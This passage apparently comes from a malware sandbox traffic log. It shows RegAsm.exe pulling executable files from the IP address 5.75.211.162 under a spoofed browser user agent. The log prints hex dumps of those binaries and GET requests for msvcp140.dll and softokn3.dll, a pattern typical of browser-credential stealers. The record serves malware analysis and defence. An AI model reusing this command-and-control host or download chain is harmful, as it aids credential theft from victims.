2024-09-26 23:37:53 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
2024-09-26 23:37:53 UTC	16384	IN	Data Raw: c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 31 ff ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 Data Ascii: #H1A$P~#HbA$P~#HUVuF\|FlNhFdFhFTNP
2024-09-26 23:37:54 UTC	16384	IN	Data Raw: ff 8b 45 a8 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c Data Ascii: EPzEPWxP1`PHP$,FM1R'^_[]00L9tc<
2024-09-26 23:37:54 UTC	16384	IN	Data Raw: 06 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 Data Ascii: )0LY)0LZ\|!i(0C}L8!i(0u9Gu)0E8)0}L
2024-09-26 23:37:54 UTC	16384	IN	Data Raw: 83 c4 04 89 45 f0 8b 06 8b 4e 04 85 c9 0f 8e b3 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 Data Ascii: EN1B]zB\|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSRE
2024-09-26 23:37:54 UTC	16384	IN	Data Raw: 42 fd ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 1b 89 c8 e9 b3 fe ff ff 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 07 89 c8 e9 c2 fe ff ff ff 15 b0 bf 08 10 cc cc cc cc 55 89 e5 57 56 89 ce 8b 79 20 85 ff 74 28 f0 ff 4f 38 75 22 8b 4f 14 83 f9 10 73 5f c7 47 10 00 00 00 00 c7 47 14 0f 00 00 00 c6 07 00 57 e8 2d 13 01 00 83 c4 04 8b 7e 18 c7 46 18 00 00 00 00 85 ff 74 1c 8b 07 85 c0 74 0d 50 ff 15 04 be 08 10 c7 07 00 00 00 00 57 e8 03 13 01 00 83 c4 04 8b 46 08 85 c0 75 2f 8b 46 04 85 c0 74 09 50 e8 ec 12 01 00 83 c4 04 5e 5f 5d c3 8b 07 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 76 20 50 e8 cf 12 01 00 83 c4 04 eb 86 c7 05 f4 f8 08 10 1a 2b 08 10 cc b9 18 00 00 00 e8 0d 80 02 00 8b 48 fc 83 c0 fc 29 c8 83 f8 20 73 04 89 c8 eb cf ff 15 b0 bf 08 10 cc cc cc cc cc cc cc Data Ascii: BH) sH) sUWVy t(O8u"Os_GGW-~FttPWFu/FtP^_]v P+H) s
2024-09-26 23:37:54 UTC	16384	IN	Data Raw: 00 00 85 db 0f 85 ad 07 00 00 c7 44 24 30 00 00 00 00 c7 44 24 34 07 00 00 00 66 c7 44 24 20 00 00 57 e8 e1 37 06 00 83 c4 04 89 c6 83 f8 07 8b 5c 24 04 0f 87 4b 03 00 00 8d 44 24 20 89 70 10 89 f1 01 f1 51 57 50 e8 fe 37 06 00 83 c4 0c 66 c7 44 74 20 00 00 8b 44 24 30 8b 4c 24 34 89 ca 29 c2 83 fa 11 0f 82 fd 05 00 00 8d 50 11 89 54 24 30 83 f9 08 72 06 8b 4c 24 20 eb 04 8d 4c 24 20 0f b7 15 de 4d 08 10 66 89 54 41 20 0f 10 05 ce 4d 08 10 0f 11 44 41 10 0f 10 05 be 4d 08 10 0f 11 04 41 66 c7 44 41 22 00 00 bf 10 00 00 00 57 e8 60 3e 00 00 83 c4 04 89 c6 8b 45 0c f2 0f 10 40 20 f2 0f 11 06 f2 0f 10 40 28 f2 0f 11 46 08 83 7c 24 34 08 72 06 8b 44 24 20 eb 04 8d 44 24 20 57 56 6a 03 6a 00 50 53 ff 15 2c e3 08 10 89 c3 56 e8 9e d2 00 00 83 c4 04 8b 4c 24 34 Data Ascii: D$0D$4fD$ W7\$KD$ pQWP7fDt D$0L$4)PT$0rL$ L$ MfTA MDAMAfDA"W`>E@ @(F\|$4rD$ D$ WVjjPS,VL$4
2024-09-26 23:37:54 UTC	16384	IN	Data Raw: 8b b8 08 00 00 00 85 ff 0f 84 0b 06 00 00 83 fb 08 0f 86 cc 02 00 00 83 c3 0f 89 d8 83 e0 f0 89 44 24 1c c1 eb 04 c1 e3 05 8d 34 1f 83 c6 50 80 7f 3c 00 89 7c 24 10 89 5c 24 18 74 0a 83 7f 40 00 0f 84 29 06 00 00 8d 47 0c 89 44 24 20 50 ff 15 30 be 08 10 8b 16 85 d2 0f 84 38 01 00 00 83 7a 08 00 0f 84 2e 01 00 00 8b 4a 04 8b 74 8a 0c 85 f6 0f 84 eb 01 00 00 8b 5f 40 85 db 75 60 0f bc fe 89 cb c1 e3 05 09 fb 0f bb fe 8b 7c 24 10 8b 44 24 18 0f af 5c 07 58 8b 44 07 68 89 74 8a 0c 01 d0 01 c3 83 42 08 ff 85 db 0f 84 a2 05 00 00 8b 44 24 1c 01 47 2c ff 74 24 20 ff 15 b0 be 08 10 85 db 0f 84 93 05 00 00 8b 4c 24 60 31 e9 e8 51 e7 01 00 89 d8 8d 65 f4 5e 5f 5b 5d c3 89 4c 24 04 89 54 24 14 8b 0b 8b 7b 04 89 3c 24 0f a4 cf 17 89 c8 c1 e0 17 31 c8 8b 53 0c 33 3c Data Ascii: D$4P<\|$\$t@)GD$ P08z.Jt_@u`\|$D$\XDhtBD$G,t$ L$`1Qe^_[]L$T${<$1S3<
2024-09-26 23:37:54 UTC	16384	IN	Data Raw: 83 e1 fe 83 e0 01 09 c8 89 42 04 89 13 8d 44 24 58 e9 75 ff ff ff c7 44 24 3c 00 00 00 00 8b 5c 24 04 e9 a5 fe ff ff 31 d2 a8 10 0f 44 54 24 18 31 c9 39 f2 0f 97 c0 0f 82 e1 fe ff ff 88 c1 e9 d5 fe ff ff b0 01 e9 ec fd ff ff 8b 46 04 83 f8 01 0f 87 13 01 00 00 89 f2 8b 06 31 c9 85 c0 8b 74 24 1c 0f 84 39 04 00 00 8b 48 04 83 e1 fe 89 0a 89 d1 83 e1 fe 89 54 24 04 8b 50 04 83 e2 01 09 ca 89 50 04 8b 54 24 04 8b 52 04 83 e2 01 09 ca 89 50 04 8b 4c 24 04 80 49 04 01 83 60 04 01 89 c1 e9 fb 03 00 00 c7 44 24 28 00 00 00 00 e9 f9 fd ff ff 8d 74 24 54 89 f1 e8 37 0b fe ff 8b 1e e9 47 ff ff ff 83 e3 fe 89 58 04 89 d6 8b 1a 85 db 0f 84 fb 01 00 00 8b 43 04 83 e0 fe 89 06 89 f0 83 e0 fe 8b 4b 04 83 e1 01 09 c1 89 4b 04 8b 4e 04 89 c8 83 e0 fe 0f 84 c0 01 00 00 8b Data Ascii: BD$XuD$<\$1DT$19F1t$9HT$PPT$RPL$I`D$(t$T7GXCKKN
2024-09-26 23:37:54 UTC	16384	IN	Data Raw: b9 00 00 00 00 0f 44 4c 24 04 31 db 39 c1 0f 97 c1 72 d1 88 cb 8b 50 04 83 e2 fe eb cc 83 e3 fe 89 1a 89 d6 83 e6 fe 8b 18 8b 48 04 83 e1 01 09 f1 89 48 04 85 db 0f 84 8d 0a 00 00 80 63 04 fe 8b 74 24 14 39 16 75 07 89 06 e9 69 ff ff ff 83 e0 fe 8b 56 04 83 e2 01 8d 0c 02 89 4e 04 85 c0 0f 84 25 0a 00 00 8b 08 83 e1 fe 09 d1 89 4e 04 89 30 8b 4e 04 83 e1 01 8b 50 04 83 e2 fe 09 ca 89 50 04 80 4e 04 01 85 ff 0f 84 1f 0a 00 00 39 37 0f 84 a0 05 00 00 e9 e0 05 00 00 8b 4c 24 1c 8b 19 89 d9 ba 00 f0 ff ff 21 d1 8b 70 08 21 d6 31 d2 39 f1 0f 97 c2 b9 ff ff ff ff 0f 42 d1 85 d2 0f 85 59 05 00 00 e9 c0 05 00 00 89 c1 85 d2 0f 85 c2 fe ff ff 8b 54 24 04 c7 02 00 00 00 00 8b 4c 24 08 c7 44 b1 14 01 00 00 00 83 fb 01 0f 84 17 02 00 00 89 10 8b 54 24 20 8b 44 24 48 Data Ascii: DL$19rPHHct$9uiVN%N0NPPN97L$!p!19BYT$L$DT$ D$H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.7	49723	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:55 UTC	197	OUT	GET /msvcp140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:55 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:55 GMT Content-Type: application/octet-stream Content-Length: 450024 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:37:55 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:37:55 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-26 23:37:55 UTC	16384	IN	Data Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
2024-09-26 23:37:55 UTC	16384	IN	Data Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-26 23:37:55 UTC	16384	IN	Data Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-09-26 23:37:55 UTC	16384	IN	Data Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-09-26 23:37:55 UTC	16384	IN	Data Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-09-26 23:37:55 UTC	16384	IN	Data Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-09-26 23:37:55 UTC	16384	IN	Data Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-09-26 23:37:55 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|
2024-09-26 23:37:55 UTC	16384	IN	Data Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.7	49724	5.75.211.162	443	1092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:37:56 UTC	197	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:37:57 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:37:57 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:37:57 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
